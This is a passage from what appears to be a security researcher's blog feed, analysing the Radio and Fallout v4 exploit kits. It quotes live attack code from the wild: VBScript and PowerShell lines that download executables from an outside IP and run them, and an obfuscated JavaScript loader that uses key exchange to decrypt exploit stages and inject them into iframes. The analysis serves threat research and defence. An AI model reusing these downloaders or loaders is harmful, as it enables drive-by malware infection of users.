class="o">&amp;</span> <span class="n">css1</span> <span class="o">&amp;</span> <span class="s">""</span> <span class="o">&amp;</span> <span class="n">ico</span> <span class="o">&amp;</span> <span class="s">""</span> <span class="k">Set</span> <span class="n">ar1</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"MSXML2.XMLHTTP"</span><span class="p">)</span> <span class="k">For</span> <span class="k">Each</span> <span class="n">i</span> <span class="ow">In</span> <span class="n">d</span> <span class="n">ar1</span><span class="p">.</span><span class="n">open</span> <span 
class="s">"GET"</span><span class="p">,</span> <span class="n">Split</span><span class="p">(</span><span class="n">d</span><span class="p">.</span><span class="n">Item</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="s">"|"</span><span class="p">)(</span><span class="mi">0</span><span class="p">),</span> <span class="n">false</span> <span class="n">ar1</span><span class="p">.</span><span class="n">send</span><span class="p">()</span> <span class="k">If</span> <span class="n">ar1</span><span class="p">.</span><span class="n">Status</span> <span class="o">=</span> <span class="n">good</span> <span class="k">Then</span> <span class="k">With</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"ADODB.Stream"</span><span class="p">)</span> <span class="p">.</span><span class="n">Open</span> <span class="p">.</span><span class="n">Type</span> <span class="o">=</span> <span class="mi">1</span> <span class="p">.</span><span class="n">Write</span> <span class="n">ar1</span><span class="p">.</span><span class="n">ResponseBody</span> <span class="p">.</span><span class="n">Position</span> <span class="o">=</span> <span class="mi">0</span> <span class="p">.</span><span class="n">SaveToFile</span> <span class="n">Split</span><span class="p">(</span><span class="n">d</span><span class="p">.</span><span class="n">Item</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="s">"|"</span><span class="p">)(</span><span class="mi">1</span><span class="p">),</span> <span class="mi">2</span> <span class="p">.</span><span class="n">Close</span> <span class="k">End</span> <span class="k">With</span> <span class="n">set</span> <span class="n">WshShell</span> <span class="o">=</span> <span class="n">WScript</span><span class="p">.</span><span class="n">CreateObject</span><span class="p">(</span><span class="s">"Wscript.Shell"</span><span class="p">)</span> <span 
class="n">WshShell</span><span class="p">.</span><span class="n">Run</span> <span class="n">temp</span> <span class="o">&amp;</span> <span class="s">""</span><span class="o">&amp;</span> <span class="n">css1</span> <span class="o">&amp;</span><span class="s">""</span> <span class="o">&amp;</span> <span class="n">ico</span> <span class="o">&amp;</span> <span class="s">""</span><span class="p">,</span> <span class="p">,</span><span class="n">true</span> <span class="k">End</span> <span class="k">If</span> <span class="k">Next</span> </code></pre></div></div> <p>This process is repeated from <code class="language-plaintext highlighter-rouge">1.jpg</code> to<code class="language-plaintext highlighter-rouge"> 5.jpg</code> in order. The <code class="language-plaintext highlighter-rouge">1.jpg</code> downloaded and executed in this way is malware. Malware is unencrypted and is plain binary.</p> <h3 id="v11">v1.1</h3> <p>Next, let’s look at v1.1.</p> <p><img src="https://nao-sec.org/assets/2019-07-16/1.1.png" alt="" /></p> <p>For v1.1, the code executed by CVE-2016-0189 is as follows:</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Set</span> <span class="kt">Object</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"Shell.Application"</span><span class="p">)</span> <span class="kt">Object</span><span class="p">.</span><span class="n">ShellExecute</span> <span class="s">"PowerShell"</span><span class="p">,</span> <span class="s">"(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1ehqM6');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/error.jp', $local_path+'documentation.vbs');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.vbs';Start-Process $local_path2"</span> </code></pre></div></div> <p>Unlike v1.0, the VBScript URL to be loaded next is <code 
class="language-plaintext highlighter-rouge">http[:]//95.215.207.24/error.jp</code>. At this time, the end of the URL is <code class="language-plaintext highlighter-rouge">.jp</code>. I don’t know if this is a mistake in hitting <code class="language-plaintext highlighter-rouge">jpg</code> or meaning <code class="language-plaintext highlighter-rouge">Japan</code>.</p> <p><code class="language-plaintext highlighter-rouge">error.jp</code> will execute code similar to v1.0 <code class="language-plaintext highlighter-rouge">load2.jpg</code>.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Set</span> <span class="n">css</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"WScript.Shell"</span><span class="p">)</span> <span class="n">css</span> <span class="o">=</span> <span class="s">"http[:]//95.215.207.24/im/"</span> <span class="n">ico</span> <span class="o">=</span> <span class="s">".exe"</span> <span class="n">css1</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span> <span class="n">css2</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">101</span><span class="p">,</span> <span class="mi">200</span><span class="p">)</span> <span class="n">css3</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">201</span><span class="p">,</span> <span class="mi">300</span><span class="p">)</span> <span class="n">css4</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span 
class="mi">301</span><span class="p">,</span> <span class="mi">400</span><span class="p">)</span> <span class="n">css5</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">401</span><span class="p">,</span> <span class="mi">500</span><span class="p">)</span> <span class="k">Set</span> <span class="n">oShell</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span> <span class="s">"WScript.Shell"</span> <span class="p">)</span> <span class="n">temp</span><span class="o">=</span><span class="n">oShell</span><span class="p">.</span><span class="n">ExpandEnvironmentStrings</span><span class="p">(</span><span class="s">"%TEMP%\"</span><span class="p">)</span> <span class="k">Dim</span> <span class="nv">good</span> <span class="k">Set</span> <span class="n">good</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"WScript.Shell"</span><span class="p">)</span> <span class="n">good</span> <span class="o">=</span> <span class="mi">200</span> <span class="c1">''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1</span> <span class="n">set</span> <span class="n">d</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"Scripting.Dictionary"</span><span class="p">)</span> <span class="n">d</span><span class="p">.</span><span class="n">Add</span> <span class="s">"1"</span><span class="p">,</span> <span class="s">""</span> <span class="o">&amp;</span> <span class="n">css</span> <span class="o">&amp;</span> <span class="s">"1.jpg|"</span><span class="o">&amp;</span><span class="n">temp&amp;</span><span class="s">""</span> <span class="o">&amp;</span> <span class="n">css1</span> <span class="o">&amp;</span> <span class="s">""</span> <span class="o">&amp;</span> <span class="n">ico</span> <span class="o">&amp;</span> 
<span class="s">""</span> <span class="k">Set</span> <span class="n">ar1</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"MSXML2.XMLHTTP"</span><span class="p">)</span> <span class="k">For</span> <span class="k">Each</span> <span class="n">i</span> <span class="ow">In</span> <span class="n">d</span> <span class="n">ar1</span><span class="p">.</span><span class="n">open</span> <span class="s">"GET"</span><span class="p">,</span> <span class="n">Split</span><span class="p">(</span><span class="n">d</span><span class="p">.</span><span class="n">Item</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="s">"|"</span><span class="p">)(</span><span class="mi">0</span><span class="p">),</span> <span class="n">false</span> <span class="n">ar1</span><span class="p">.</span><span class="n">send</span><span class="p">()</span> <span class="k">If</span> <span class="n">ar1</span><span class="p">.</span><span class="n">Status</span> <span class="o">=</span> <span class="n">good</span> <span class="k">Then</span> <span class="k">With</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"ADODB.Stream"</span><span class="p">)</span> <span class="p">.</span><span class="n">Open</span> <span class="p">.</span><span class="n">Type</span> <span class="o">=</span> <span class="mi">1</span> <span class="p">.</span><span class="n">Write</span> <span class="n">ar1</span><span class="p">.</span><span class="n">ResponseBody</span> <span class="p">.</span><span class="n">Position</span> <span class="o">=</span> <span class="mi">0</span> <span class="p">.</span><span class="n">SaveToFile</span> <span class="n">Split</span><span class="p">(</span><span class="n">d</span><span class="p">.</span><span class="n">Item</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="s">"|"</span><span class="p">)(</span><span 
class="mi">1</span><span class="p">),</span> <span class="mi">2</span> <span class="p">.</span><span class="n">Close</span> <span class="k">End</span> <span class="k">With</span> <span class="n">set</span> <span class="n">WshShell</span> <span class="o">=</span> <span class="n">WScript</span><span class="p">.</span><span class="n">CreateObject</span><span class="p">(</span><span class="s">"Wscript.Shell"</span><span class="p">)</span> <span class="n">WshShell</span><span class="p">.</span><span class="n">Run</span> <span class="n">temp</span> <span class="o">&amp;</span> <span class="s">""</span><span class="o">&amp;</span> <span class="n">css1</span> <span class="o">&amp;</span><span class="s">""</span> <span class="o">&amp;</span> <span class="n">ico</span> <span class="o">&amp;</span> <span class="s">""</span><span class="p">,</span> <span class="p">,</span><span class="n">true</span> <span class="k">End</span> <span class="k">If</span> <span class="k">Next</span> </code></pre></div></div> <p>This is also repeated until <code class="language-plaintext highlighter-rouge">/im/5.jpg</code>. The downloaded / executed <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> is malware. As in v1.0, malware is not encrypted.</p> <h3 id="v120">v1.2.0</h3> <p>Finally, let’s look at v1.2.</p> <p><img src="https://nao-sec.org/assets/2019-07-16/1.2.png" alt="" /></p> <p>It became very simple. It can be said that nothing is over. 
The code executed by CVE-2016-0189 is as follows:</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Set</span> <span class="kt">Object</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"Shell.Application"</span><span class="p">)</span> <span class="kt">Object</span><span class="p">.</span><span class="n">ShellExecute</span> <span class="s">"PowerShell"</span><span class="p">,</span> <span class="s">"(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1YdQt7');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/im/1.jpg', $local_path+'documentation.exe');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.exe';Start-Process $local_path2"</span> </code></pre></div></div> <p>Thus, <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> downloaded and executed is malware. As before, malware is not encrypted.</p> <p>The path of <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> has only changed since v1.2.0. The essential process is the same.</p> <h2 id="conclusion">Conclusion</h2> <p>Radio EK is active, but its attack power is very low. Compared to RIG and Fallout, the threat is not something that bothers you. However, there may be aggressive updates in the future. You should be aware of the existence of this EK.</p>
  61. Steady Evolution of Fallout v4

    Tue, 09 Jul 2019 15:00:00 -0000

    First

    We have been observing the Fallout Exploit Kit since August 2018. Fallout uses non-characteristic URLs and a heavily obfuscated landing page. It still has users, and attacks are observed daily. Recently we were investigating an attack campaign that infects victims with Raccoon Stealer through the flow PopAds -&gt; KeitaroTDS -&gt; Fallout.

    We have already written three reports about Fallout. The first was about the emergence of Fallout, the second about its adoption of PowerShell, and the third about its use of a PoC from GitHub. We divide these major changes by version and call them v1~3.

    Hello “Fallout Exploit Kit”
    In-Depth analysis of new Fallout Exploit Kit
    Analysis of Fallout Exploit Kit v3

    We wrote about v3 in March 2019. v3 was not stable and was updated to the next version immediately. @EKFiddle (created and maintained by @jeromesegura) reported this change on April 11.

    #EKFiddle [Regex update]: #FalloutEK
    Seems like there is no more use of the PoC on GitHub for CVE-2018-8174.
    Pushing #GandCrab in this particular instance.
    https://t.co/U67qZosp1e pic.twitter.com/buVTakYuhJ
    &mdash; EKFiddle (@EKFiddle) April 11, 2019

    We call this big update v4 (the current version is still v4). No detailed analysis report has been written about what this update changed. However, the update is very big. At least for us, as exploit kit analysts, it made analysis very cumbersome. Fallout v4 incorporates the following features.

    1. Diffie-Hellman key exchange
    2. VM detection
    3. Process detection

    Here we share the detailed results of our analysis of the updates made in Fallout v4. Unfortunately, we did not understand everything. If you know more, please help us.

    Traffic chain

    First, let’s look at the previous traffic chain. v1~3 looked like this. In v3 it fetched the PoC for CVE-2018-8174 from GitHub and attacked by rewriting only the shellcode part. So what does the v4 traffic chain look like?

    1. Landing Page
    2. JavaScript Code
    3. Encoded Code 1
    4. Encoded Code 2 (CVE-2018-8174 + SWF Loader)
    5. CVE-2018-15982
    6. PowerShell Code
    7. Malware

    In this way, an attack is performed over seven requests. Let’s look at each in order. (In the following we use different traffic data from the above. The detailed reason is given later, but it is difficult to capture and analyze traffic at the same time.)

    Landing Page + JS Code + Encoded Data

    In the landing page, JavaScript code is loaded first.

        &lt;!DOCTYPE html&gt;
        &lt;html&gt;
        &lt;head&gt;
        &lt;meta http-equiv="x-ua-compatible" content="IE=10"&gt;
        &lt;script type="text/javascript" src="/04_09_2003/Symposium?Peristele=02_03_1943&amp;LE3r=Aps&amp;ILZhH=Frazzling-Anorexias"&gt;&lt;/script&gt;
        &lt;/head&gt;

    This file contains obfuscated copies of CryptoJS and a BigInteger library. Excluding the large library parts, there is very little processing.

        // key
        window.III1l1 = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("8b69cbdfc5fe43e69b7920c8ee721fc9");
        // iv
        window.II1ll11I = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("301ae8205ddcd5897df69e3b0c056c34");
        // aes_decrypt(enc_data, key, iv)
        window.l11llIll = window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"]("p4N9IqH/oiAKHkDCR0zXXfrvhwVrVPsFZSNUjkVFXxxBofjpd5JLM1sdAega3oRy", III1l1, { lI1lIl1Ill: II1ll11I })["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]);

    First, two values appear (8b69cbdfc5fe43e69b7920c8ee721fc9 and 301ae8205ddcd5897df69e3b0c056c34). These are the key and IV for AES. Decrypting the following Base64 string with this key and IV yields the data needed next (specifically, the URL from which the encoded data used in the next step is fetched). Decrypting it gives that URL.

    Next, it checks which browser is in use: Opera, Firefox, IE or Chrome.
        // check browser
        window["String"]["prototype"]["II1l1IlI"] = function () {
            return (!!window["opr"] &amp;&amp; !!window["opr"]["addons"] || !!window["opera"] || navigator["userAgent"]["indexOf"](" OPR/") &gt;= 0)
                + this + (typeof window["InstallTrigger"] !== "undefined")
                + this + (false || !!window["document"]["documentMode"])
                + this + (!!window["chrome"] &amp;&amp; !!window["chrome"]["runtime"])
        };

    Then there is a check of the Adobe Flash Player version. This data is used later.

        (function () {
            window.l1l111I = '';
            try {
                window.l1l111I = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').getVariable('$version')
            } catch (e) {}
        })();

    The process then returns to the landing page. In the landing page, one function is defined and executed. Let’s look at that function.

        // str_A
        var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']();
        // str_B
        var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16);
        // str_C
        var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16);
        // str_D
        var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16);
        // str_E =&gt; str_B.modPow(str_C, str_D)
        var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll, lll1II);

    Here, expressions such as window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']() appear many times. This is defined in CryptoJS and generates a random 32-character hexadecimal string. After generating four random values, the second, third and fourth are used to compute the fifth, via modPow. The five values prepared here are used in the cryptographic process that follows. We call them str_A, str_B, str_C, str_D and str_E.

    The following code has three parts: the onreadystatechange handler that runs once the request has been sent to the server, the code that builds the data to send, and the code that sends it. These are standard XMLHttpRequest POST steps. First, let’s look at how the data to send is built.

        var l11IlIIlllll = {};
        l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B
        l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D
        l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E
        l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A
        // browser check data
        l11IlIIlllll['II1l1IlI'] = '@@' ['II1l1IlI']();

    Five values are added to the object l11IlIIlllll. All but the last are the random values created earlier: of the five random values, every one except str_C is sent. The last one is the browser check data generated earlier. It checks whether the browser is Opera, Firefox, IE or Chrome, respectively, giving true or false for each, concatenated with @@. This is the data prepared for sending. Note that str_C is not sent to the server. Next, let’s look at the sending process.

        window['I1l1I1'](Il1I11l, "post", l11llIll, true);
        /* -- snip -- */
        // Send POST
        window['l1lllIIlI'](
            Il1I11l,
            // aes_encrypt(data, key, iv)
            window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill'](
                window['IIII1Il'](l11IlIIlllll), // post request data
                window['III1l1'], // key
                { lI1lIl1Ill: window['II1ll11I'] } // iv
            )['lIlIlll11l']()
        );

    This is also a generic request-sending routine. The URL is the string decrypted with AES earlier. The data sent is the data prepared above, encrypted with AES. The key and IV are the same ones used to decrypt the URL. Before encryption the data looks like this.

        {
            "lIlII11":"c81e728d9d4c2f636f067f89cc14862c",
            "lll1II":"a87ff679a2f3e71d9181a67b7542122c",
            "l11IlIl":"3f05415ebff145466040f6a73dca8704",
            "lI1lIl1Ill":"c4ca4238a0b923820dcc509a6f75849b",
            "II1l1IlI":"false@@false@@true@@false"
        }

    The data actually sent is encrypted, like this.
        TvU4TAyld3MNlDcMtLwxBo+uVXAbIB1jpPO1a9HDv2dZs7HonG67s8heWoMyvnUFqFBdoEhU0STYjHHQxX6DK7x7Z1naG/2TAdm+AR5l6gpYVl4jXB9oOOyfJtZrfJHabQT5Jhlqv1dtvsJ+0G27qhamqtPT16wCpXn2R2WHf8NJu9SvXSSVadW7sT6QDt32Jt0z3oR0VIlpuE/w3snfKDNIjJYhuMz/VGYIL9WNdg0hC26sxB5fJ5fOOuifh2rNk9GgNsNdfVP01Tf77GRDu9puTbgfsgYOnCz0ONOmp05B14kJ1tK8ZI6ciOWLvOYV

    Let’s look at what happens after sending. onreadystatechange is called, and two AES decryptions are performed. Let’s look at the first.

        // aes_decrypt(enc_data, key, iv)
        var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
            Il1I11l['responseText'], // enc_data
            window['III1l1'], // key
            { lI1lIl1Ill: window['II1ll11I'] } // iv
        )['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']);
        var l1I1l1 = window['lIl11'](lIlIl1IIl11);

    The POST response is encrypted with AES. The key and IV are the same as before, namely the values (8b69cbdfc5fe43e69b7920c8ee721fc9 and 301ae8205ddcd5897df69e3b0c056c34) hard-coded in the JavaScript. Decrypting it yields JSON, so the result is parsed as JSON. The decrypted JSON looks like this.

        {
            "IlI1l":"9b412e5c651d73fd1e271dd63f6901a0",
            "I1111":"r+sZGwxURs48PDt8pilYLNYjKbVrMHSmlgv0jeEE7qd8KN+KbbqRpYBUUrEFfM5VSLfRPthHQmyzFoY7fuCtOQQ9vUiMBC+3\/pL…"
        }

    The second value is decrypted using the first (a 32-character hexadecimal string). We call the first value str_F. The decryption is again AES, but the key and IV differ from before.
        var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'], 16); // str_F
        // key (str_G) =&gt; str_F.modPow(str_C, str_D)
        var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll, lll1II);
        var I1Il1I1 = llIIlI['lIlIlll11l'](16);
        var IIIIlI1IllII = 32 - I1Il1I1.length;
        while (IIIIlI1IllII &gt; 0) {
            I1Il1I1 = '0' + I1Il1I1;
            IIIIlI1IllII--;
        }
        var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1);
        var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1);
        // aes_decrypt(enc_data, key, iv)
        var Il11lII1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
            l1I1l1['lIlIl1IIl11'], // enc_data
            II1ll, // str_G
            { lI1lIl1Ill: lI1lIl1Ill } // iv =&gt; str_A
        );

    The value computed from str_F, str_C and str_D is called str_G. So str_C is required to decrypt the data, but str_C was never sent to the server. From the traffic data you can see str_E and str_G, both derived from str_C, but you cannot recover str_C itself. See Wikipedia for details: Diffie–Hellman key exchange - Wikipedia.

    The data decrypted this way is executed as JavaScript.

        // eval
        II1Il['ll1I1']();

    Let’s look at the executed code. First, the URL used next is decrypted. The key and IV used here are the hard-coded initial values.

        // aes_decrypt(enc_url, key, iv)
        var l11l1I1 =window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"](
            "l9kie2x7t4Iq4hRNA3G3Juz+buSrv9OSyATsAvZRjsoWkjatAa3Am6oRnar5jjv2N8XFpvDYQbKswFbyKiGPXM/eRwj5+hz4hg+dTKr5BLk=",
            III1l1,
            { lI1lIl1Ill:II1ll11I }
        )["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]);

    Then, as before, the function is called. Let’s look at it. First, the data needed for encryption and decryption is defined as before. We name each value as before.
        // str_A2
        var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']();
        // str_B2
        var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16);
        // str_C2
        var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16);
        // str_D2
        var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16);
        // str_E2 =&gt; str_B2.powMod(str_C2, str_D2)
        var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll,lll1II);

    Next, the data to send as a POST request is prepared. Unlike before, the Adobe Flash Player version information is also sent.

        var l11IlIIlllll = {};
        l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B2
        l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D2
        l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E2
        l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A2
        l11IlIIlllll['II1l1IlI'] = '@@'['II1l1IlI'](); // browser check data
        l11IlIIlllll['l1l111I'] = window['l1l111I']; // Adobe Flash Player version check data

    The sending process is the same as before. The key and IV used here are also the initial values.

        window['I1l1I1'](Il1I11l,"post",l11l1I1,true);
        window['l1lllIIlI'](
            Il1I11l,
            // aes_encrypt
            window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill'](
                window['IIII1Il'](l11IlIIlllll), // POST Data
                window['III1l1'], // key
                {lI1lIl1Ill:window['II1ll11I']} // iv
            )['lIlIlll11l']()
        );

    Then onreadystatechange is called as well, and the same decryption process is performed. First, the POST response is decrypted with the same key and IV as before.
```javascript
// aes_decrypt(enc_data, key, iv)
var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
  Il1I11l['responseText'],              // enc_data
  window['III1l1'],                     // key
  { lI1lIl1Ill: window['II1ll11I'] }    // iv
)['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']);
```

When the decoded result is parsed as JSON, it contains three values like this. The first 32-character hexadecimal string is called str_F2.

```json
{
  "lIlll1IIlI": "87e087b48d4b06215f486021f23f5470",
  "lIIIIllIl1": "oUeRtTwLk9lLYqMwZC3AM49H8HDw15IqymZ0W\/vw87Vd9RtdXhps9ZppZc\/INO01Bqk79BOMS9ykHCDPE\/\/kWCHQuuh0\/rr…",
  "II11lIl11": "88HY4nkc9TWmnRPi\/hEPmk8ZCTJ5tIwItosOTmqFjUBFxCXfoXdMKas+TeKLUbdwsXAhvGa35wNmMnajdPzt1huWerzwnhoGcFP…"
}
```

These are then decrypted, which yields two pieces of data.

```javascript
var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'], 16); // str_F2
// str_G2 => str_F2.modPow(str_C2, str_D2)
var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll, lll1II);
var I1Il1I1 = llIIlI['lIlIlll11l'](16);
var IIIIlI1IllII = 32 - I1Il1I1.length;
while (IIIIlI1IllII > 0) {
  I1Il1I1 = '0' + I1Il1I1;
  IIIIlI1IllII--;
}
var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1);      // str_G2
var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1);   // str_A2
// aes_decrypt()
var I1II111I1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
  l1I1l1['lIIIIllIl1'],        // enc_data_1
  II1ll,                       // str_G2
  { lI1lIl1Ill: lI1lIl1Ill }   // str_A2
);
var IIIIl = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
  l1I1l1['II11lIl11'],         // enc_data_2
  II1ll,                       // str_G2
  { lI1lIl1Ill: lI1lIl1Ill }   // str_A2
);
```

The decoded data is written into the document body and executed. It consists of the CVE-2018-8174 exploit code and the SWF loader that fetches the CVE-2018-15982 exploit.
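The two exchanges above (str_B/str_C/str_D/str_E/str_F/str_G and their 2-suffixed counterparts) modelled in Python as an added example; this is not the kit's code, and the server's private exponent and the POST field names are assumptions. str_D is whatever 16 random bytes parse to, not a vetted Diffie-Hellman group, but the point for an analyst stands: a passive capture shows str_A, str_B, str_D, str_E and str_F and never str_C or str_G, so the next stage cannot be decrypted from traffic alone without also recovering str_C from the browser.

```python
"""Added example (not the kit's code): a Python model of the Fallout v4 key
exchange, using the page's names. Per exchange the JavaScript draws four random
16-byte values, keeps str_C secret, sends str_B, str_D, str_E and str_A, and
derives the AES key str_G from the server's reply str_F. The server's private
exponent and the POST field names are assumptions made for this model."""
import random
import secrets

HEX_LEN = 32  # the key is a 16-byte value written as 32 hex characters


def pad_hex(value: int) -> str:
    """Same as the JS while-loop: left-pad the hex form with '0' to 32 chars."""
    return format(value, "x").rjust(HEX_LEN, "0")


class FalloutClient:
    """Browser side of one exchange (rand_hex(n) returns n random bytes as hex)."""

    def __init__(self, rand_hex=secrets.token_hex):
        self.str_A = rand_hex(16)            # AES IV, sent in the clear
        self.str_B = int(rand_hex(16), 16)   # base, sent
        self.str_C = int(rand_hex(16), 16)   # private exponent, never sent
        self.str_D = int(rand_hex(16), 16)   # modulus, sent (random, not a vetted prime)
        self.str_E = pow(self.str_B, self.str_C, self.str_D)  # public value, sent

    def post_body(self) -> dict:
        # assumed field names; the real kit uses obfuscated ones
        return {"B": pad_hex(self.str_B), "D": pad_hex(self.str_D),
                "E": pad_hex(self.str_E), "A": self.str_A}

    def derive_key(self, str_F_hex: str) -> str:
        """str_G = str_F ^ str_C mod str_D, padded exactly as the JS does."""
        return pad_hex(pow(int(str_F_hex, 16), self.str_C, self.str_D))


def server_respond(post: dict, server_secret: int):
    """Assumed server side: reply with str_F = B^s mod D and keep G = E^s mod D.

    Both sides end up with B^(C*s) mod D, whether or not D is prime."""
    B, D, E = (int(post[k], 16) for k in ("B", "D", "E"))
    return pad_hex(pow(B, server_secret, D)), pad_hex(pow(E, server_secret, D))


def wire_view(post: dict, str_F_hex: str) -> dict:
    """Everything a passive capture contains: A, B, D, E from the client, F from the server."""
    return {**post, "F": str_F_hex}


def run_exchange(seed=None):
    """Run one exchange; returns (client key, server key, what the wire shows)."""
    rng = random.Random(seed)

    def rand_hex(n: int) -> str:
        return format(rng.getrandbits(8 * n), f"0{2 * n}x")

    client = FalloutClient(rand_hex)
    post = client.post_body()
    str_F, server_key = server_respond(post, int(rand_hex(16), 16))
    client_key = client.derive_key(str_F)
    return client_key, server_key, wire_view(post, str_F)


if __name__ == "__main__":
    ck, sk, wire = run_exchange()
    print("keys agree:", ck == sk, "| fields visible on the wire:", sorted(wire))
```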
```javascript
// each decoded payload is written into its own iframe
if (IlIII1lll['length'] !== 0) {
  var IIlIl = window['document']['createElement']("iframe");
  IIlIl['setAttribute']("id", "IlIlll1I1");
  window['document']['getElementsByTagName']("BODY")[0].appendChild(IIlIl);
  var I11I11IIlIII = window['document']['getElementById']("IlIlll1I1")['contentWindow']['document'];
  I11I11IIlIII['open']();
  I11I11IIlIII['write'](IlIII1lll);
  I11I11IIlIII['close']();
}
if (lIl1l1I['length'] !== 0) {
  var l1III11 = window['document']['createElement']("iframe");
  l1III11['setAttribute']("id", "lII1I1IlI1I");
  window['document']['getElementsByTagName']("BODY")[0].appendChild(l1III11);
  var llIll1lI = window['document']['getElementById']("lII1I1IlI1I")['contentWindow']['document'];
  llIll1lI['open']();
  llIll1lI['write'](lIl1l1I);
  llIll1lI['close']();
}
```

For the SWF loader, the following code is executed.

```html
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>
<body>
